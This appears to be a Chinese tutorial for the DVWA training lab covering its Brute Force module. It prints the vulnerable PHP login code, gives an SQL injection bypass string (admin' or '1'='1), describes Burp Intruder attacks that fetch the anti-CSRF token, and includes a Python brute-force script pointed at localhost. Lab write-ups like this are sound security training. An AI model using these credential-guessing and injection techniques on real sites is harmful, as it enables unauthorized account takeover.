目录
1、级别:Low
使用brupsuite进行暴力破解时,在通常情况下是已知username而进行暴力破解,否则需要浪费大量的时间。(注:因此在此处也设定已知username为admin。)
1.1 输入用户名密码进行抓包,发送至repeater查看
1.2 发至Intruder,进行爆破
1.3 输入账号密码 成功登录
1.4 我们查看一下网页源代码
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Get username
$user = $_GET[ 'username' ];
// Get password
$pass = $_GET[ 'password' ];
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
只要传入参数即为真即可,考虑进行一个sql注入:admin’ or ‘1’='1 ,也能成功登录
2、级别:Medium
与low级别区别不大,一样用bp进行爆破就好了,就是时间会更长一点,因为每尝试一次密码失败后 sleep 2秒才能进行下一个密码的尝试
区别可能就在于无法利用sql注入来进行密码绕过
我们来看看源代码
<?php
if( isset( $_GET[ 'Login' ] ) ) {
// Sanitise username input
$user = $_GET[ 'username' ];
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitise password input
$pass = $_GET[ 'password' ];
$pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass = md5( $pass );
// Check the database
$query = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
if( $result && mysqli_num_rows( $result ) == 1 ) {
// Get users details
$row = mysqli_fetch_assoc( $result );
$avatar = $row["avatar"];
// Login successful
echo "<p>Welcome to the password protected area {$user}</p>";
echo "<img src=\"{$avatar}\" />";
}
else {
// Login failed
sleep( 2 );
echo "<pre><br />Username and/or password incorrect.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
多了一条
$user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
·isset() 函数用于检测变量是否已设置并且非 NULL。返回TRUE。
·is_object() 函数用于检测变量是否是一个对象
·mysqli_real_escape_string() 函数转义在 SQL 语句中使用的字符串中的特殊字符。返回已转义的字符串。
由于mysqli_real_escape_string()对字符串进行了转义,所以sql注入将不能运用。
3、级别:High
抓包我们可以发现,新增了token机制
Token是服务端生成的一串字符串,以作客户端进行请求的一个令牌,当第一次登录后,服务器生成一个Token便将此Token返回给客户端,以后客户端只需带上这个Token前来请求数据即可,无需再次带上用户名和密码。
由于使用了Anti-CSRF token,每次服务器返回的登陆页面中都会包含一个随机的user_token的值,用户每次登录时都要将user_token一起提交。服务器收到请求后,会优先做token的检查,再进行sql查询。
3.1 把抓的包发送到intruder,攻击类型设置为Clusterbomb,我们选中我们需要攻击的目标
3.2 password使用字典爆破
3.3 user_token就不是单纯的使用字典了,需要从我们的页面中获取
重定向设置为总是
把user_token设为参数2,最后点击 Start attack (注意要把线程数改为1)
成功得到密码
python脚本方法
DVWA——Brute Force(暴力破解) - 戚源 - 博客园
#! /usr/bin/env/python
#-*-coding:utf-8-*-
import requests
from bs4 import BeautifulSoup
#字典
payloads = [
'administrator',
'admin',
'password',
'passwd',
'123456',
'123'
]
url = """http://localhost/dvwa/vulnerabilities/brute/?username={0}&password={1}&Login=Login&user_token={2}#"""
cookies = {
'security':'high',
'PHPSESSID':'cd1fggfc0bi84c3lh7kpsh98g2',
'mask':'123'
}
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36',
}
def attack(payloads,url):
#先要获得user_token
source = 'http://localhost/dvwa/vulnerabilities/brute/index.php#'
index = 0
web_data = requests.get(source,headers = headers,cookies=cookies)#请求必须带上cookie,因为dvwa需要登陆
soup = BeautifulSoup(web_data.text, 'lxml')
user_token = soup.select('input[name="user_token"]')[0]['value']
#从字典枚举
for payload1 in payloads:
for payload2 in payloads:
target = url.format(payload1,payload2,user_token)
print u'当前请求:'+target
web_data = requests.get(target,headers = headers,cookies=cookies)
soup = BeautifulSoup(web_data.text,'lxml')
user_token = soup.select('input[name="user_token"]')[0]['value']
feature = soup.find('pre')
try:
if feature.get_text()=='Username and/or password incorrect.':#错误的密码或者用户名就会页面会出现此语句,这也是我们需要检索的
print u'错误'
except:
print u'可能得到结果:'
print 'username:'+payload1+'\n'+'password:'+payload2
exit(u'结束')
if __name__ == '__main__':
attack(payloads,url)